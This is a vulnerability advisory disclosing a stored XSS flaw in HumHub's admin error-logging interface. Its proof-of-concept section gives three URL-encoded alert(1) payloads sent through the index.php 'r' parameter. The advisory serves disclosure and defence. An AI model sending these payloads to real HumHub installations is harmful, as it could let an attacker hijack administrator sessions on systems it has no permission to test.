LEAKFREE-2014-007 / OSVDB-115637

HumHub index.php r Parameter Error Messages Stored XSS

[+] OSVDB-ID: OSVDB-115637
[+] LF-ID: LEAKFREE-2014-007
[+] CVSS: 7.0
[+] Vendor: HumHub
[+] Product: HumHub
[+] Versions affected: 0.10.0-rc1 and earlier

Vulnerability

In HumHub versions 0.10.0-rc1 and earlier, the admin error logging codebase is vulnerable to a persistent XSS vulnerability. In most modules' error logging functionality, there is no XSS sanitation on the error message before passing it to the database and since there is no XSS sanitation before displaying error messages in the admin error logging interface, causing an error with a URL-encoded XSS string (different modules' error logging allow for different XSS vectors) in the parameter will cause the XSS to be persistently logged in the admin error logging interface, potentially allowing an attacker, among other attack vectors, to hijack the admin's session.

Proof of Concept


index.php?r=post/post/post%3Csvg%20onload%3Dalert(1)%3E
    


index.php?r=mail/mail/indexdf%3Cimg%20src=%22x%22%20onerror=%22alert(1)%22%3E
    


index.php?r=notification/list/index&from=999)%3Cscript%3Ealert(1)%3C/script%3E
    

The above requests wil insert the corresponding script elements into the admin error logging interface.

Mitigation

Upgrade to the latest HumHub release [1]

References

1. https://github.com/humhub/humhub/releases

Contact

Voor meer informatie of een vrijblijvende offerte kunt u contact met ons opnemen via contact@leakfree.nl (PGP)